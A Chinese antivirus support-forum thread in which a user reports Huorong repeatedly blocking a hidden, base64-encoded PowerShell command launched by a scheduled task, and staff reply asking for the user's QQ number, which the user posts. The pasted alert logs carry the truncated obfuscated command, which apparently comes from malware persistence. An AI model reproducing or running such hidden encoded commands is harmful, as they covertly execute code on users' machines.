火绒安全软件

动态防御问题反馈
发新帖
打印 上一主题 下一主题

cmd.exe触犯敏感动作防护规则

[复制链接]
3335 7
楼主
发表于 2023-1-6 17:22:47 | 只看该作者 |倒序浏览 |阅读模式
跳转到指定楼层
每过半小时就跳出来一次,强行打断我的全屏应用。全盘查杀过病毒了没发现什么问题,请问是什么情况,如何解决?

防护项目:隐藏执行PowerShell
执行文件:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行:powershell  -WindowStyle Hidden -E "CgAKACQAQQBzAGMAXwBFAG4AYwBTAHQAcgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQA7AAoAJABSAFYAXwBsAGQAIAA9ACAAIgAyADcAIgA7AAoACgAKACQAbgBqAF8AdgBhAHIAMQA9ACQAbgB1AGwAbAA7AAoAJAB2ADIAXwBQAFIATQAgAD0AIAAiAFcAeQBJADUATQBUAGcAMwBOAFQAawB3AE0AVABRAHcATQBqAGsAMwBNAHoAWQB5AE0ARABVADAASQBpAHcAeABOAGoAWQAyAE4ARABjADQATQBEAGMAdwBMAEMASgBOAFYARgBrAHkAVABrAFIAUgBTAFUASgAzAE4ARQBSAEIAVQBXAGQASABRAG4AZABCAFIAVQBGADMATwBFAEoAQwBkADAAbABFAFEAbQBkAE4AUQBWAE4AQgBaADAARgBDAGQAMQBWAE4AUQBtAHQAdgBTAEUARgBuAFMAVQBoAEIAWgAwAFYATgBRAGsARgBCAFEAVgBOAG4ASgBUAE4ARQBKAFQATgBFAEkAbAAwAD0AIgA7AAoAJABvAGsAPQAkAHQAcgB1AGUACgAKAGYAdQBuAGMAdABpAG8AbgAgAHYAYQBsAHUAZQBGAHIAbwBtAEkAdABlAG0ASQBuAGQAeAAoAFsAcwB0AHIAaQBuAGcAXQAkAGEAcgByAF8AYgB0AHMAMgApACAAewAKAAkAJABhAHIAcgBfAGIAdABzAD0AWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYQByAHIAXwBiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAQQBzAGMAXwBFAG4AYwBTAHQAcgAuAEcAZQB0AEIAeQB0AGUAcwA
操作结果:已阻止

进程ID:7296
操作进程:C:\Windows\System32\cmd.exe
操作进程命令行:C:\Windows\system32\cmd.EXE /c powershell -WindowStyle Hidden -E "CgAKACQAQQBzAGMAXwBFAG4AYwBTAHQAcgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQA7AAoAJABSAFYAXwBsAGQAIAA9ACAAIgAyADcAIgA7AAoACgAKACQAbgBqAF8AdgBhAHIAMQA9ACQAbgB1AGwAbAA7AAoAJAB2ADIAXwBQAFIATQAgAD0AIAAiAFcAeQBJADUATQBUAGcAMwBOAFQAawB3AE0AVABRAHcATQBqAGsAMwBNAHoAWQB5AE0ARABVADAASQBpAHcAeABOAGoAWQAyAE4ARABjADQATQBEAGMAdwBMAEMASgBOAFYARgBrAHkAVABrAFIAUgBTAFUASgAzAE4ARQBSAEIAVQBXAGQASABRAG4AZABCAFIAVQBGADMATwBFAEoAQwBkADAAbABFAFEAbQBkAE4AUQBWAE4AQgBaADAARgBDAGQAMQBWAE4AUQBtAHQAdgBTAEUARgBuAFMAVQBoAEIAWgAwAFYATgBRAGsARgBCAFEAVgBOAG4ASgBUAE4ARQBKAFQATgBFAEkAbAAwAD0AIgA7AAoAJABvAGsAPQAkAHQAcgB1AGUACgAKAGYAdQBuAGMAdABpAG8AbgAgAHYAYQBsAHUAZQBGAHIAbwBtAEkAdABlAG0ASQBuAGQAeAAoAFsAcwB0AHIAaQBuAGcAXQAkAGEAcgByAF8AYgB0AHMAMgApACAAewAKAAkAJABhAHIAcgBfAGIAdABzAD0AWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYQByAHIAXwBiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAQQBzAGMAXwBFAG4AYwBTA
父进程ID:2328
父进程:C:\Windows\System32\svchost.exe
父进程命令行:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule


防护项目:隐藏执行PowerShell
执行文件:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行:powershell  -WindowStyle Hidden -E "CgAKACQAQQBzAGMAXwBFAG4AYwBTAHQAcgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQA7AAoAJABSAFYAXwBsAGQAIAA9ACAAIgAyADcAIgA7AAoACgAKACQAbgBqAF8AdgBhAHIAMQA9ACQAbgB1AGwAbAA7AAoAJAB2ADIAXwBQAFIATQAgAD0AIAAiAFcAeQBJADUATQBUAGcAMwBOAFQAawB3AE0AVABRAHcATQBqAGsAMwBNAHoAWQB5AE0ARABVADAASQBpAHcAeABOAGoAWQAyAE4ARABjADQATQBEAGMAdwBMAEMASgBOAFYARgBrAHkAVABrAFIAUgBTAFUASgAzAE4ARQBSAEIAVQBXAGQASABRAG4AZABCAFIAVQBGADMATwBFAEoAQwBkADAAbABFAFEAbQBkAE4AUQBWAE4AQgBaADAARgBDAGQAMQBWAE4AUQBtAHQAdgBTAEUARgBuAFMAVQBoAEIAWgAwAFYATgBRAGsARgBCAFEAVgBOAG4ASgBUAE4ARQBKAFQATgBFAEkAbAAwAD0AIgA7AAoAJABvAGsAPQAkAHQAcgB1AGUACgAKAGYAdQBuAGMAdABpAG8AbgAgAHYAYQBsAHUAZQBGAHIAbwBtAEkAdABlAG0ASQBuAGQAeAAoAFsAcwB0AHIAaQBuAGcAXQAkAGEAcgByAF8AYgB0AHMAMgApACAAewAKAAkAJABhAHIAcgBfAGIAdABzAD0AWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYQByAHIAXwBiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAQQBzAGMAXwBFAG4AYwBTAHQAcgAuAEcAZQB0AEIAeQB0AGUAcwA
操作结果:已阻止

进程ID:7296
操作进程:C:\Windows\System32\cmd.exe
操作进程命令行:C:\Windows\system32\cmd.EXE /c powershell -WindowStyle Hidden -E "CgAKACQAQQBzAGMAXwBFAG4AYwBTAHQAcgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQA7AAoAJABSAFYAXwBsAGQAIAA9ACAAIgAyADcAIgA7AAoACgAKACQAbgBqAF8AdgBhAHIAMQA9ACQAbgB1AGwAbAA7AAoAJAB2ADIAXwBQAFIATQAgAD0AIAAiAFcAeQBJADUATQBUAGcAMwBOAFQAawB3AE0AVABRAHcATQBqAGsAMwBNAHoAWQB5AE0ARABVADAASQBpAHcAeABOAGoAWQAyAE4ARABjADQATQBEAGMAdwBMAEMASgBOAFYARgBrAHkAVABrAFIAUgBTAFUASgAzAE4ARQBSAEIAVQBXAGQASABRAG4AZABCAFIAVQBGADMATwBFAEoAQwBkADAAbABFAFEAbQBkAE4AUQBWAE4AQgBaADAARgBDAGQAMQBWAE4AUQBtAHQAdgBTAEUARgBuAFMAVQBoAEIAWgAwAFYATgBRAGsARgBCAFEAVgBOAG4ASgBUAE4ARQBKAFQATgBFAEkAbAAwAD0AIgA7AAoAJABvAGsAPQAkAHQAcgB1AGUACgAKAGYAdQBuAGMAdABpAG8AbgAgAHYAYQBsAHUAZQBGAHIAbwBtAEkAdABlAG0ASQBuAGQAeAAoAFsAcwB0AHIAaQBuAGcAXQAkAGEAcgByAF8AYgB0AHMAMgApACAAewAKAAkAJABhAHIAcgBfAGIAdABzAD0AWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYQByAHIAXwBiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAQQBzAGMAXwBFAG4AYwBTA
父进程ID:2328
父进程:C:\Windows\System32\svchost.exe
父进程命令行:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule


回复

使用道具 举报

3335 7
沙发
发表于 2023-1-6 17:26:56 | 只看该作者
您好 这边确认下 再给您答复~
回复

使用道具 举报

3335 7
板凳
发表于 2023-1-7 01:38:53 | 只看该作者
火绒运营专员 发表于 2023-1-6 17:26
您好 这边确认下 再给您答复~

好的 谢谢
回复

使用道具 举报

3335 7
地板
发表于 2023-1-7 18:24:20 | 只看该作者
火绒运营专员 发表于 2023-1-6 17:26
您好 这边确认下 再给您答复~

你好 请问还需要多久呢
回复

使用道具 举报

3335 7
5#
发表于 2023-1-9 17:42:10 | 只看该作者
火绒运营专员 发表于 2023-1-6 17:26
您好 这边确认下 再给您答复~

还记得我吗hello hello
回复

使用道具 举报

3335 7
6#
发表于 2023-1-9 17:45:03 | 只看该作者
huoronghr2023 发表于 2023-1-9 17:42
还记得我吗hello hello

您好,您可以留下qq,这边详细给您看下问题~
回复

使用道具 举报

3335 7
7#
发表于 2023-1-9 20:08:25 | 只看该作者
火绒运营专员 发表于 2023-1-9 17:45
您好,您可以留下qq,这边详细给您看下问题~

1410040868
回复

使用道具 举报

3335 7
8#
发表于 2023-1-9 20:12:12 | 只看该作者

好的,我们会在明日尽快添加一下您的QQ,麻烦您留意一下验证信息谢谢
回复

使用道具 举报

您需要登录后才可以回帖 登录 | [立即注册]

本版积分规则

快速回复 返回顶部 返回列表